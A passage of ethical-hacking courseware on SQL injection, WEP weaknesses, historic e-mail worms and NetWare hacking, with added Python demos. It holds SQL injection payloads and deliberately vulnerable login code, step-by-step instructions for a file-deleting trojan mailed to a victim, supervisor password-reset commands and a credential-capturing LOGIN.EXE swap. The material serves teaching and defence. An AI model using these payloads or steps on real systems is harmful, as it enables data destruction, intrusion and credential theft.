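        "safe_bypass": login_safe(conn, injected, "wrong"),
        "safe_valid": login_safe(conn, "admin", "correct-horse-battery"),
        "allowlist": validate_username(injected),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:12} {result!r}")
```

Parameter binding is the measure that removes the injection; the allowlist and quote escaping are defence in depth on top of it, and the verbose error should be logged server-side rather than returned to the client.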






Summary

• SQL Injection is an attack methodology that targets the data residing in a database through the firewall that shields it.

• It attempts to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database.

• Database footprinting is the process of mapping out the tables on the database and is a crucial tool in the hands of an attacker.

• Exploits occur due to coding errors as well as inadequate validation checks.

• Prevention involves enforcing better coding practices and database administration procedures.
Module XV

Hacking Wireless Networks

Module Objective

• Introduction to 802.11
• What is WEP?
• Finding WLANs
• Cracking WEP Keys
• Sniffing Traffic
• Wireless DoS attacks
• WLAN Scanners
• WLAN Sniffers
• Securing Wireless Networks
• Hacking Tools
Introduction to Wireless Networking

• Wireless networking technology is becoming increasingly popular but at the same time has introduced many security issues.

• The popularity of wireless technology is driven by two primary factors - convenience and cost.

• A Wireless local area network (WLAN) allows workers to access digital resources without being locked into their desks.

• Laptops can be carried into meetings or even into a Starbucks cafe, tapping into the wireless network. This convenience has become affordable.
What is 802.11x?

• Wireless LAN standards are defined by the IEEE's 802.11 working group. WLANs come in three flavors:

• 802.11b

  - Operates in the 2.4000GHz to 2.2835GHz frequency range and can operate at up to 11 megabits per second.

• 802.11a

  - Operates in the 5.15-5.35GHz to 5.725-5.825GHz frequency range and can operate at up to 54 megabits per second.

• 802.11g

  - Operates in the 2.4GHz frequency range (increased bandwidth range) and can operate at up to 54 megabits per second.

Note: WEP standards are defined in the 802.11 standard and not the individual standards. WEP vulnerabilities have the potential to affect all flavors of 802.11 networks.
Setting Up a WLAN

• When setting up a WLAN, the channel and service set identifier (SSID) must be configured in addition to traditional network settings such as IP address and subnet mask.

• The channel is a number between 1 and 11 (1 and 13 in Europe) and designates the frequency on which the network will operate.

• The SSID is an alphanumeric string that differentiates networks operating on the same channel.

• It is essentially a configurable name that identifies an individual network. These settings are important factors when identifying WLANs and sniffing traffic.
© The SSID is a unique identifier that wireless networking 
devices use to establish and maintain wireless 
connectivity. 

© The SSID acts as a single shared "password" between access 
points and clients, but it is not a secret: it is sent in the 
clear in beacons, probe requests and association requests, 
so it must not be relied on for access control. 

© Security concerns arise when the default values are not 
changed, as such units can be easily compromised. 

© A non-secure access mode allows clients to connect to 
the access point using the configured SSID, a blank 
SSID, or an SSID configured as "any". 



What is WEP? 



© WEP is a component of the IEEE 802.11 WLAN 
standard. Its primary purpose is to provide 
confidentiality of data on wireless networks at a level 
equivalent to that of wired LANs. 

© Wired LANs typically employ physical controls to 
prevent unauthorized users from connecting to the 
network and viewing data. In a wireless LAN, the 
network can be accessed without physically connecting 
to the LAN. 

© IEEE chose to employ encryption at the data link layer 
to prevent unauthorized eavesdropping on a network. 
This is accomplished by encrypting the frame body with the RC4 
stream cipher, keyed with a 24-bit per-frame initialization vector (IV) 
prepended to the shared 40- or 104-bit WEP key; the IV itself 
travels in the clear ahead of the ciphertext. 
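The following script is an added example for this section, not code from the courseware, from AirSnort or from WEPCrack. It implements the WEP construction just described (RC4 keyed with IV || key, CRC-32 ICV, IV sent in the clear) with the standard library only, and shows the two weaknesses the module's summary refers to: any two frames sent under the same IV share a keystream, so one known plaintext exposes the other without the key, and a 24-bit IV space is so small that a repeat is expected after only a few thousand frames. The 40-bit key and the two frame payloads are constructed test values, not captured traffic.

```python
"""Why WEP's RC4 + 24-bit IV construction leaks: keystream reuse.

Added example; not code from the courseware, AirSnort or WEPCrack.
RC4 is implemented inline so the script needs only the standard library.
The key and payloads in __main__ are constructed, not captured.
"""
import math
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                   # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV in the clear || RC4_(IV||key)(plaintext || CRC-32 ICV)."""
    if len(iv) != 3 or len(wep_key) not in (5, 13):
        raise ValueError("WEP uses a 3-byte IV and a 40- or 104-bit key")
    icv = zlib.crc32(plaintext).to_bytes(4, "little")   # linear checksum, not a MAC
    body = plaintext + icv
    return iv + xor(body, rc4_keystream(iv + wep_key, len(body)))


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes:
    """Inverse of wep_encrypt; raises if the ICV does not match."""
    iv, ciphertext = frame[:3], frame[3:]
    body = xor(ciphertext, rc4_keystream(iv + wep_key, len(ciphertext)))
    plaintext, icv = body[:-4], body[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        raise ValueError("ICV check failed")
    return plaintext


def recover_with_known_plaintext(frame_a: bytes, plaintext_a: bytes,
                                 frame_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so
    C_a xor C_b = P_a xor P_b: knowing P_a reveals P_b without the key."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("IVs differ; keystreams are independent")
    n = min(len(plaintext_a), len(frame_b) - 3 - 4)   # skip IV, stop before ICV
    keystream = xor(frame_a[3:3 + n], plaintext_a[:n])
    return xor(frame_b[3:3 + n], keystream)


def frames_until_iv_repeat(probability: float = 0.5, iv_bits: int = 24) -> int:
    """Birthday bound: frames sent before some IV repeats with the given
    probability, assuming the card picks IVs uniformly at random."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")                 # constructed 40-bit key
    iv = b"\x00\x00\x01"
    p_a = b"GET /index.html HTTP/1.0"                 # guessable plaintext
    p_b = b"user=bob&pass=secret123!"                 # what we want to read
    c_a, c_b = wep_encrypt(key, iv, p_a), wep_encrypt(key, iv, p_b)
    assert wep_decrypt(key, c_a) == p_a
    print("recovered:", recover_with_known_plaintext(c_a, p_a, c_b))
    print("frames for a 50% IV collision:", frames_until_iv_repeat())
```

Many early cards reset the IV to zero on power-up and count upward, which is worse than the random-IV figure computed here; the statistical weak-IV attack that AirSnort and WEPCrack implement is a separate weakness of RC4's key schedule and is not shown in this script.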
MAC Sniffing & AP Spoofing 



© MAC addresses are easily sniffed by an attacker since 
they must appear in the clear even when WEP is 
enabled: WEP encrypts only the frame body, never the 
802.11 header. 

© An attacker can use this to masquerade as a valid 
client by programming the wireless card with a sniffed 
MAC address, get into the wireless network and 
use its bandwidth. 

© Spoofing a MAC address is very easy. Using packet- 
capturing software, an attacker can determine a valid 
MAC address from a single packet. 

© To perform an AP spoofing attack, an attacker sets up 
a rogue access point near the target wireless network, 
or in a place where a victim may believe that wireless 
Internet is available, and waits for clients to associate. 
Denial of Service 



© Wireless LANs are susceptible to the same 
protocol-based attacks that plague wired LANs. 

© WLANs send information via radio waves on public 
(unlicensed) frequencies, thus they are susceptible to 
inadvertent or deliberate interference from traffic 
using the same radio band. 



Wireless DoS Attacks 

Figure: a wireless access point operating at 2.4 GHz being 
disrupted by a jamming signal on the same 2.4 GHz band. 



Hacking Tool: NetStumbler 



http://www.netstumbler.org 

© NetStumbler is a high-level WLAN scanner. It operates 
actively, sending a steady stream of probe requests on all 
possible channels. 

© Access points answer probe requests with probe responses, 
which reveals them even if SSID broadcast in their beacons 
has been disabled (though many APs ignore probes that carry 
a blank SSID, which is why a passive sniffer such as 
Kismet finds networks NetStumbler misses). 

© NetStumbler displays: 

• Signal strength 

• MAC address 

• SSID 

• Channel details 
Hacking Tool: AiroPeek 



http://www.wildpackets.com 

© AiroPeek is a comprehensive packet analyzer for IEEE 802.11 
wireless LANs, supporting all higher-level network 
protocols such as TCP/IP, AppleTalk, NetBEUI and IPX. 

© In addition, AiroPeek quickly isolates security 
problems, fully decodes 802.11a and 802.11b WLAN 
protocols, and analyzes wireless network 
performance with accurate identification of signal 
strength, channel and data rates. 
Hacking Tool: AirSnort 



http://airsnort.shmoo.com/ 

© AirSnort is a wireless LAN (WLAN) tool which recovers 
WEP encryption keys. AirSnort operates by passively 
monitoring transmissions, computing the encryption 
key when enough packets have been gathered. 

© AirSnort requires approximately 5-10 million encrypted 
packets to be gathered; only the fraction carrying 
"weak" IVs actually contributes to the key recovery. 

© Once enough packets have been gathered, AirSnort can 
recover the key in under a second. 
Hacking Tool: Kismet 



© Kismet is an 802.11b wireless network sniffer 
which separates and identifies different 
wireless networks in the area. 

© Kismet works with any wireless card which is 
capable of reporting raw packets (monitor mode). 

Screenshot: Kismet network list, sorted by time first detected, 
showing for each network its name, type, WEP flag, channel, 
packet count and client count, with the log lines 

Found new network "<no ssid>" bssid 00:02:2D:0E:7A:B7 WEP Y Ch 7 
Found new network "linksys" bssid 00:06:25:53:0B:89 WEP N Ch 6 
Hacking Tool: WEPCrack 



© WEPCrack is an open source tool for breaking 802.11 
WEP secret keys. 

© While AirSnort has captured the media attention, 
WEPCrack was the first publicly available code that 
demonstrated the weak-IV attack AirSnort implements. 

© The current tools are Perl based and are composed of 
the following scripts: 

WeakIVGen.pl, prism-getIV.pl, WEPCrack.pl 




WLAN Scanners and Sniffers 



© Network discovery tools run on 802.11 stations and 
passively monitor beacon and probe response frames. 
They typically display discovered devices by SSID, 
channel, MAC address and location. 

© Vulnerability assessment tools, in addition to network 
discovery, sniff traffic to spot security policy violations. 

© Traffic monitoring and analysis tools also provide 
discovery and vulnerability alerting. In addition, they 
capture and examine packet content. 

© IDSes may use signature analysis, protocol inspection, 
rules enforcement and/or anomaly detection. 




WIDZ, Wireless Intrusion Detection 
System 



© WIDZ version 1 is a proof-of-concept IDS for 802.11 that 
guards APs and monitors the local airspace for potentially malevolent activity. 

© It detects scans, association floods, and bogus/rogue APs. It can 
easily be integrated with Snort or RealSecure. 

Figure: a rogue access point placed between the target and the 
attacker's PC and used to hijack the session. 
Securing Wireless Networks 



© MAC Address Filtering 

This method uses a list of MAC addresses of client 
wireless network interface cards that are allowed to 
associate with the access point. Because MAC addresses 
travel in the clear and are trivially spoofed (see the MAC 
sniffing slide), this raises the bar only slightly. 

© SSID (Network ID) 

The first attempt to secure wireless networks was the use 
of the Network ID (SSID). When a wireless client wants to 
associate with an access point, the SSID is transmitted 
during the process. The SSID is an alphanumeric identifier 
of up to 32 bytes that is configured on the access point 
and the client device; since it is transmitted in the clear, 
it is not a secret. 

© Firewalls 

A firewall between the WLAN segment and the wired network 
limits what an attacker who manages to join the WLAN can 
reach. It is one of the few measures here that actually 
prevents unauthorized access to internal resources, but it 
does nothing to protect the wireless traffic itself. 
Out of the Box Security 

RADIUS: used as an additional layer in the 
security 

Figure: wireless clients authenticate through the access point 
to an authentication server (RADIUS). 

Maximum Security: Add a VPN to the 
Wireless LAN 
Summary 



© A WLAN enables a mobile user to connect to a local area network (LAN) 
through a wireless (radio) connection. 

© Wired Equivalent Privacy (WEP) is a security protocol specified in the IEEE 
802.11 standard that is designed to provide a wireless local area 
network (WLAN) with a level of security and privacy comparable to what is 
usually expected of a wired LAN. 

© WEP is vulnerable because of its short (24-bit) IVs, which can be exhausted 
in hours on a busy network, and keys that remain static, so the same RC4 
keystream is reused and weak-IV statistical attacks can recover the key. 

© Even if WEP is enabled, MAC addresses can be easily sniffed by an attacker as 
they appear in the clear. Spoofing a MAC address is also easy. 

© If an attacker holds wireless equipment near a wireless network, he will be 
able to perform a spoofing attack by setting up a rogue access point near 
the target wireless network. 

© Wireless networks are extremely vulnerable to DoS attacks. 

© A variety of hacking and monitoring tools are available for wireless 
networks as well. 

© Securing wireless networks includes adopting a suitable strategy such as MAC 
address filtering, firewalling, RADIUS authentication, a VPN over the WLAN, 
or a combination of protocol-based measures. 
Ethical Hacking 



Module XVI 
Viruses 



Module Objective 



© Chernobyl 
© ExploreZip 
© I Love You 
© Melissa 
© Pretty Park 
© Code Red Worm 
© W32/Klez 
© BugBear 

© W32/Opaserv Worm 
© Anti-Virus Software 
W32.CIH.Spacefiller (a.k.a. Chernobyl) 



© Chernobyl is a destructive virus. Unlike the other viruses 
that have surfaced recently, this one is much more than 
a nuisance. 

© When it triggers, Chernobyl erases data on your hard 
drive and attempts to overwrite the flash BIOS, which 
may keep your machine from booting up at all. 

© There are several variants in the wild, and each variant 
activates on a different date: version 1.2 on April 26th, 
1.3 on June 26th, and 1.4 on the 26th of every month. 
Win32/ExploreZip Virus 



© ExploreZip is a Win32-based e-mail worm. It searches 
for Microsoft Office documents on your hard drive and 
network drives. 

© When it finds any Word, Excel, or PowerPoint 
documents with the extensions .doc, .xls and 
.ppt, it erases the contents of those files. It also 
e-mails itself in reply to anyone who sends you an e-mail. 

© ExploreZip arrives as an e-mail attachment. The 
message will most likely come from someone you know, 
and the body of the message will read: 

"I received your email and I shall send you a reply 
ASAP. Till then, take a look at the attached zipped 
docs." The attachment will be named "Zipped_files.exe" 
and has a WinZip icon. Double-clicking the program 
infects your computer. 
I Love You Virus 



© LoveLetter is a Win32-based e-mail 
worm written in VBScript. It overwrites certain 
files on your hard drive(s) and sends itself out 
to everyone in your Microsoft Outlook address book. 

© LoveLetter arrives as an e-mail 
attachment named LOVE-LETTER- 
FOR-YOU.TXT.vbs, though new variants 
have different names including 
VeryFunny.vbs, virus_warning.jpg.vbs 
and protect.vbs. The double extension hides 
the real .vbs type when Windows is configured 
to hide known file extensions. 
What is SQL Insertion Vulnerability? 



© User-controlled data is placed into an SQL 
query without being validated for correct 
format or embedded escape strings. 

© Affects the majority of applications which use a 
database backend and don't enforce variable 
types. 

© At least 50% of the large e-commerce sites and 
about 75% of the medium to small sites are 
vulnerable. 

© Improper validation in CFML, ASP, JSP and 
PHP are the most frequent causes. 
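As an added example for the slide above (not code from the courseware), the script below puts the flaw it describes next to the fix: user-controlled strings spliced into query text, and a numeric column with no type enforcement, beside the parameterised and type-checked forms. It uses Python's sqlite3 on an in-memory database; the users table and its rows are a constructed fixture, and the login functions are hypothetical, written only to make the failure mode visible (plaintext passwords are kept in the fixture for that reason, not as a recommendation).

```python
"""SQL insertion: concatenated query text beside the parameterised form.

Added example; not code from the courseware. Uses an in-memory sqlite3
database with a constructed users table.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed fixture (not real data). Plaintext passwords are kept
    only so the injection result is easy to see."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, "
               "password TEXT, role TEXT)")
    db.executemany("INSERT INTO users (name, password, role) VALUES (?, ?, ?)",
                   [("admin", "Tr0ub4dor&3", "admin"), ("bob", "hunter2", "user")])
    return db


def vulnerable_login(db, name: str, password: str):
    """User input spliced into the SQL text: the CFML/ASP/PHP pattern the
    slide describes. A quote in the input ends the string literal early."""
    sql = (f"SELECT name, role FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone()


def safe_login(db, name: str, password: str):
    """Same query with placeholders: the driver sends values separately,
    so quotes and comment markers in the input stay data, never SQL."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone()


def vulnerable_user_by_id(db, user_id: str):
    """Numeric column with no type enforcement: '1 OR 1=1' returns every row
    without needing any quote character at all."""
    return db.execute(f"SELECT name FROM users WHERE id = {user_id}").fetchall()


def safe_user_by_id(db, user_id: str):
    """Force the type first (int() raises ValueError on junk), then bind it."""
    return db.execute("SELECT name FROM users WHERE id = ?",
                      (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, comment trick :", vulnerable_login(db, "admin' --", ""))
    print("vulnerable, tautology     :", vulnerable_login(db, "x' OR '1'='1", "x' OR '1'='1"))
    print("parameterised, same input :", safe_login(db, "admin' --", ""))
    print("vulnerable numeric        :", vulnerable_user_by_id(db, "1 OR 1=1"))
```

sqlite3's execute() refuses to run more than one statement, so a stacked `'; DROP TABLE users; --` payload fails here with an error rather than succeeding; many other database drivers (and the ODBC-based stacks the slide names) do execute stacked statements, so do not read that as protection.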
Melissa Virus 



© Melissa is a Microsoft Word macro virus. 

© Through macros, the virus drives the Microsoft Outlook e-mail program 
so that the virus gets sent to the first 50 people in your address book. 

© It does not corrupt any data on your hard drive or make your 
computer crash. It just changes some Word settings and sends itself to 
the people you don't want to infect. 

© Melissa Virus Infection 

• Melissa arrives as an e-mail attachment. 

• The subject of the message containing the virus will read: "Important 
message from" followed by the name of the person whose e-mail account it 
was sent from. 

• The body of the message reads: "Here's the document you asked for...don't 
show anyone else ;-)". Double-clicking the attached Word document 
(typically named LIST.DOC) will infect your machine. 
Pretty Park 



© Pretty Park is a privacy-invading worm. 
Every 30 seconds, it tries to e-mail itself to 
the e-mail addresses in your Microsoft 
Outlook address book. 

© It has also been reported to connect your 
machine to a custom IRC channel for the 
purpose of retrieving passwords from your 
system. 

© Pretty Park arrives as an e-mail 
attachment. Double-clicking the 
PrettyPark.exe or Files32.exe program 
infects your computer. 

© You may see the Pipes screen saver after 
running the executable. 

Screenshot: an Explorer window in C:\WINNT showing the dropped 
files, among them files32.vxd and Pretty Park.exe. 
BugBear Virus 



© This worm propagates via shared network folders and via e-mail. 

© It also terminates antivirus programs, acts as a backdoor server 
application, and sends out system passwords, all of which 
compromise security on infected machines. 

© BugBear Infection 

• This worm fakes the FROM field and obtains the recipients for its 
e-mail from e-mail messages, address books and mailboxes on the 
infected system. It generates the filename for the attached copy of 
itself from the following: 

• A combination of text strings (setup, card, docs, news, image, 
images, pics, resume, photo, video, music, song or data) with any of 
the extensions SCR, PIF or EXE; or the name of an existing system file 
appended with any of the following extensions: SCR, PIF or EXE. 

• On systems with unpatched Internet Explorer 5.0 and 5.5, the 
worm attachment is executed automatically when messages are 
either opened or previewed using Microsoft Outlook or Outlook 
Express. 



W32/Klez 



Aliases: ElKern, KLAZ, Kletz, I-Worm.Klez, 
W95/Klez@mm 

© W32.Klez variants are mass-mailing 
worms that search the 
Windows address book for e-mail 
addresses and send messages to all 
the recipients found. The 
worm uses its own SMTP engine to 
send the messages. 

© The subject and attachment name 
of the incoming e-mails are 
randomly chosen. The attachment 
will have one of the extensions .bat, 
.exe, .pif or .scr. 

© The worm exploits a vulnerability 
in Microsoft Outlook and Outlook 
Express to execute itself when 
you open or preview the message. 
Screenshots: two Klez messages as received at an anti-virus 
vendor's sample address on 5 March 2002. 

Subject: A humour game 
Body: "This is a very humour game. This game is my first work. 
You're the first player. I wish you would like it." 

Subject: A powful tool 
Content-Type: text/html 
Body: "Hello, This is a powful tool. I expect you would like it." 
Attachment: heightS.pif 



SirCam Worm 



© SirCam is a mass-mailing e-mail 
worm with the ability to spread 
through Windows network shares. 

© SirCam sends e-mails with variable 
user names and subject fields, and 
attaches user documents with double 
extensions (such as .doc.pif or 
.xls.lnk) to them. 

© The worm collects a list of files with 
certain extensions ('.DOC', '.XLS', 
'.ZIP') into fake DLL files named 
'sc*.dll'. The worm then sends itself 
out with one of the document files it 
found in the user's "My Documents" 
folder. 

Screenshot: an Outlook inbox showing a SirCam message from 
"Bart Simpson" with subject "Sopimus" and body "Hi! How are you? 
I send you this file in order to ... See you later. Thanks". 
Nimda Virus 



© Nimda is a complex virus with a 
mass-mailing worm component 
which spreads itself in attachments 
named README.EXE. 

© It affects Windows 95, 98, ME, 
NT4 and Windows 2000 users. 

© Nimda is the first worm to modify 
existing web sites to start offering 
infected files for download. It is also 
the first worm to use normal end- 
user machines to scan for 
vulnerable web sites. 

© Nimda uses the IIS Unicode directory 
traversal exploit to infect IIS web servers. 
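Every mass-mailing worm on the preceding slides (ExploreZip, LoveLetter, Pretty Park, BugBear, Klez, SirCam, Nimda) arrives as an attachment whose name is the giveaway: an executable extension, a document extension hiding an executable one, or one of a small set of fixed names. The script below is an added example of the mail-gateway check that follows from that, not code from the courseware or from any anti-virus vendor. The name stems, extensions and fixed attachment names are the ones the slides give; the sample message is constructed with the standard email library, and the heuristic names (known-worm-name, double-extension, and so on) are this example's own.

```python
"""Attachment-name heuristics for the mass-mailing worms described above.

Added example; not code from the courseware or from any AV vendor.
Lists below are taken from the slides; the sample message is constructed.
"""
import email
from email import policy
from email.message import EmailMessage

EXECUTABLE_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".vbs", ".js", ".lnk"}
DOCUMENT_EXT = {".doc", ".xls", ".ppt", ".zip", ".txt", ".jpg"}
# attachment names the slides give for specific worms (matched case-insensitively)
KNOWN_WORM_NAMES = {"zipped_files.exe", "love-letter-for-you.txt.vbs",
                    "veryfunny.vbs", "virus_warning.jpg.vbs", "protect.vbs",
                    "prettypark.exe", "files32.exe", "readme.exe"}
BUGBEAR_STEMS = {"setup", "card", "docs", "news", "image", "images", "pics",
                 "resume", "photo", "video", "music", "song", "data"}


def classify_attachment(filename: str) -> list:
    """Return the heuristics a filename trips (empty list = nothing found)."""
    name = filename.lower()
    parts = name.split(".")
    exts = ["." + p for p in parts[1:]]
    hits = []
    if name in KNOWN_WORM_NAMES:
        hits.append("known-worm-name")
    if exts and exts[-1] in EXECUTABLE_EXT:
        hits.append("executable-extension")
    # SirCam / LoveLetter style: a document extension hiding an executable one
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXT and exts[-1] in EXECUTABLE_EXT:
        hits.append("double-extension")
    if parts[0] in BUGBEAR_STEMS and exts and exts[-1] in {".scr", ".pif", ".exe"}:
        hits.append("bugbear-style-name")
    return hits


def scan_message(raw: bytes) -> list:
    """Parse a raw RFC 822 message and return (filename, hits) for each
    attachment that trips at least one heuristic."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        hits = classify_attachment(filename)
        if hits:
            findings.append((filename, hits))
    return findings


def build_message(subject: str, body: str, attachment_name: str,
                  payload: bytes = b"MZ\x90\x00 constructed, not a binary") -> bytes:
    """Constructed sample message; addresses use a reserved example domain."""
    msg = EmailMessage()
    msg["From"] = "Sender <sender@example.test>"
    msg["To"] = "samples@example.test"
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=attachment_name)
    return msg.as_bytes()


if __name__ == "__main__":
    # wording and attachment name taken from the Klez sample shown above
    raw = build_message("A powful tool",
                        "Hello, This is a powful tool\nI expect you would like it.",
                        "heightS.pif")
    print(scan_message(raw))
```

A real gateway would also compare the declared Content-Type with the file's magic bytes and strip or quarantine rather than merely report; the point here is that name-based rules alone already catch every sample named on these slides, which is why the worm authors moved on to random names and to the auto-execute flaw the BugBear and Klez slides mention.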
Code Red Worm 



© The "Code Red" worm attempts to connect to TCP port 
80 on a randomly chosen host, assuming that a web 
server will be found. 

© Upon a successful connection to port 80, the attacking 
host sends a crafted HTTP GET request to the victim, 
attempting to exploit a buffer overflow in the Windows 
2000 Indexing Service (the IIS .ida ISAPI extension). 

© If the exploit is successful, the worm begins executing 
on the victim host. In the earlier variant of the worm, 
victim hosts with a default language of English 
experienced the following defacement on all pages 
requested from the server: 

HELLO! Welcome to http://www.worm.com! 
Hacked By Chinese! 
Writing Your Own Simple Virus 



© Step 1: Create a batch file Game.bat with the following 
text: 

@echo off 
delete c:\winnt\system32\*.* 
delete c:\winnt\*.* 

© Step 2: Convert the Game.bat batch file to Game.com 
using the bat2com utility. 

© Step 3: Assign an icon to Game.com using the Windows file 
properties screen. 

© Step 4: Send the Game.com file as an e-mail attachment 
to a victim. 

© Step 5: When the victim runs this program, it deletes 
core files in the WINNT directory, making Windows 
unusable. (Strictly, this is a trojan rather than a virus: 
it does not replicate, it relies on the victim running it.) 
Hacking Tool: Senna Spy Internet 
Worm Generator 



(http://sennaspy.cjb.net) 

This tool can generate a 
VBS worm. An executable 
can be inserted. 

Screenshot: Senna Spy Internet Worm Generator 2000 - 2.0, with 
fields for worm name and subject and options such as 
"Outlook set spread?" and "Registry auto-start?". 



Anti-Virus Software 



© The primary prevention against 
viruses is to install anti-virus 
software and keep the updates 
current, together with prompt patching 
of the client-side flaws (such as the 
unpatched Internet Explorer versions 
BugBear and Klez rely on). 

© Prominent anti-virus software 
vendors include: 

1. McAfee 

2. Norton AntiVirus 

3. AntiViral Toolkit Pro 

4. Dr. Solomon's 

5. Trend Micro 

6. Command Antivirus 

7. Data Fellows 

Screenshot: the Symantec Security Response web site, carrying the 
alert "W32.SQLExp.Worm is a Category 3 worm that targets servers 
running Microsoft SQL. The worm sends 376 bytes to 1434/udp (the 
SQL Server Resolution Service port). Symantec Security Response 
recommends configuring perimeter devices to block 1434/udp traffic 
from untrusted hosts." 

Virus Encyclopedia resources at Symantec 
Summary 



© Viruses come in different forms. 

© Some are mere nuisances; some come with devastating 
consequences. 

© E-mail worms are self-replicating and clog 
networks with unwanted traffic. 

© Virus code is not necessarily complex. 

© It is necessary to scan systems and networks for 
infections on a periodic basis for protection against 
viruses. 

© Signatures for new virus releases are promptly made 
available by security companies, and this forms the 
major countermeasure. 
Ethical Hacking 



Module XVII 
Novell Hacking 



Module Objective 



© Common accounts and passwords 

© Accessing password files 

© Password crackers 

© NetWare hacking tools 

- Chknull 

- NOVELBFH 

- NWPCRACK 

- Bindery 

- BinCrack 

- SETPWD.NLM 

- Kock 

- userdump 

- Burglar 

- Getit 

- Spooflog 

- Gobbler 

- Novelffs 

- Pandora 
Novell NetWare Basics 



© Object Model 

© Access Control Lists 

© Rights 

© Levels of Access 

© Packet Signature 
Default Accounts and Settings 



© Server Settings 
© Supervisor Account 
© Default Rights 
© RCONSOLE security concerns 
© Server Commands and Settings 

Screenshot: MONITOR.NLM running at the server console. 
Valid Account Names on Novell 
NetWare 



© Any limited account should have enough access to allow 
you to run SYSCON, located in the SYS:PUBLIC directory. 

© If you get in, type SYSCON and press Enter. Now go to User 
Information and you will see all defined accounts. 

© You will not get much info with a limited account, but 
you can get the account name and the user's full name. 

© If you are in with any valid account, you can run 
USERLIST.EXE and get a list of all valid account names 
on the server. 
Hacking Tool: Chknull.exe 



CHKNULL shows you every account with no password, 
and you do not have to be logged in. For this to work, 
bindery emulation must be on. 

Screenshot: CHKNULL output, listing each account that 
"HAS A NULL PASSWORD". 
Access the Password File in Novell 
NetWare 



© Access to the password file in NetWare is not like 
Unix: the password file is not in the open. All objects 
and their properties are kept in the bindery files on 
3.x, and in the NDS database on 4.x. 

© The bindery file attributes (or flags) in 3.x are Hidden 
and System, and these files are located on the SYS: 
volume in the SYSTEM subdirectory. 

© 3.x: NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS 

© NET$BVAL.SYS and NET$VAL.SYS are where the 
passwords are actually located in 2.x and 3.x 
respectively. 
Access the Password File in Novell 
NetWare (contd..) 



© In NetWare 4.x, the files are physically located in a 
different location than on the SYS: volume. 

© By using the RCONSOLE utility and the Scan 
Directory option, you can see the files in 
SYS:_NETWARE. 

© There is another way to view these files and potentially 
edit them. After installing NW4 on a NW3 volume, reboot 
the server with the 3.x SERVER.EXE. 

© On the SYS volume they will be in the _NETWARE directory. 
SYS:_NETWARE is hidden better on 4.1 than on 4.0x, but in 
4.1 you can still see the files by scanning the directory 
entry numbers using NCP calls (you need the APIs for 
this), using function 0x17 subfunction 0xFB. 
Tool: NOVELBFH.EXE & 
NWPCRACK.EXE 



Screenshot: NWPCRACK usage banner: 

NWPCRACK 0.5 beta - Netware Password Cracker - Written by Teiwaz & Gray 
Send any comments or bug reports to teiwaz@wolfenet.com 
Usage is: NWPCRACK User_Name Dictionary_File_Name /Location 
ie.. NWPCRACK SUPERVISOR C:\HACK\BIGDICT.TXT 

NWPCRACK will work against the current preferred server setting 
that is stored in the net.cfg file 

© NOVELBFH is a brute-force password cracker which works 
on NetWare 3.x versions. 

© NWPCRACK is a password cracker that works against a 
single account and uses a dictionary word list. 
Hacking Tool: Bindery.exe & 
BinCrack.exe 



© Bindery.exe is a password cracker that works directly 
against the .OLD bindery files. 

© This tool extracts user information out of bindery files 
into a Unix-style password text file. 

© Then you can use BINCRACK.EXE to "crack" the 
extracted text file. 



Hacking Tool: SETPWD.NLM 



If you have access to the 
console, either by 
standing in front of it or 
by RCONSOLE, you can 
use SETSPASS.NLM, 
SETSPWD.NLM or 
SETPWD.NLM to reset 
passwords. 

Just load the NLM and 
pass it command line 
parameters: 

NLM            Account(s) reset     NetWare version(s) supported 
SETSPASS.NLM   SUPERVISOR           3.x 
SETSPWD.NLM    SUPERVISOR           3.x, 4.x 
SETPWD.NLM     any valid account    3.x, 4.x 

How to Use SETPWD.NLM 

You can load SETPWD at the console or via RCONSOLE. 
If you use RCONSOLE, use the Transfer Files To Server option 
and put the file in SYS:SYSTEM. 

For 3.x: 

LOAD [path if not in SYS:SYSTEM] SETPWD [username] [newpassword] 

For 4.x: 

SET BINDERY CONTEXT = [context, e.g. hack.corp.us] 
LOAD [path if not in SYS:SYSTEM] SETPWD [username] [newpassword] 
Other Tools 



© Hacking Tool: Kock 

For NetWare 3.11; exploits a bug in NetWare to attach and log in 
without a password. 

© Hacking Tool: userdump 

UserDump simply lists all users in the Bindery. Works for 
NetWare 3.x and 4.x (in Bindery Mode). 

© Hacking Tool: NWL 

Replacement LOGIN.EXE for Novell NetWare. Run PROP.EXE 
from a Supervisor account to create a new property. 

Replace the existing LOGIN.EXE in SYS:LOGIN. 

Each time a user logs in, the typed credentials are stored in the new property. 
Use PROP.EXE to retrieve captured logins. 
